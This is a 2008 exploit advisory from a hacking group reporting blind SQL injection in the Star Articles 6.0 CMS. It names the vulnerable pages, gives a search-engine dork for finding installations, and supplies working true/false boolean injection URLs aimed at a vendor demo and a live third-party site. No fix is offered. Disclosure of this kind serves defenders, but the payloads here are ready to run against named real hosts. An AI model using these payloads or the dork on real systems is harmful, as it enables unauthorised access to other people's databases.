Star Articles 6.0 Remote Blind SQL Injection Vulnerability

2008-11-26 23:30:04

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ stararticles blind sql injection Vulnerability +
+ +
+ Discovered by b3hz4d +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


APA Center of Yazd University
(https://www.ircert.cc)


AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE : 26 nov 2008
SITE : WwW.DeltaHacking.Net
CONTACT: [email protected]

#####################################################

APPLICATION : stararticles
DOWNLOAD(175$): http://cmsnx.com/psf/order.php?id=5
VENDOR : http://www.stararticles.com/
DEMO : http://www.kalptarudemos.com/demo/stararticle/
DORK : inurl:"article.download.php"

#####################################################


[+] vuln : blind sql injection

many of pages are vulnerable to blind sql injection:

./article.list.php

./article.print.php

./article.comments.php

./article.publisher.php

.
.
.

[+] Exploit :
true:

http://www.kalptarudemos.com/demo/stararticle/article.download.php/1090%20and%20substring(@@version,1,1)=5
http://www.bigarticle.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=5

false:

http://www.kalptarudemos.com/demo/stararticle/article.download.php/1090%20and%20substring(@@version,1,1)=4
http://www.bigarticle.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=4


##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #

##########################################################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.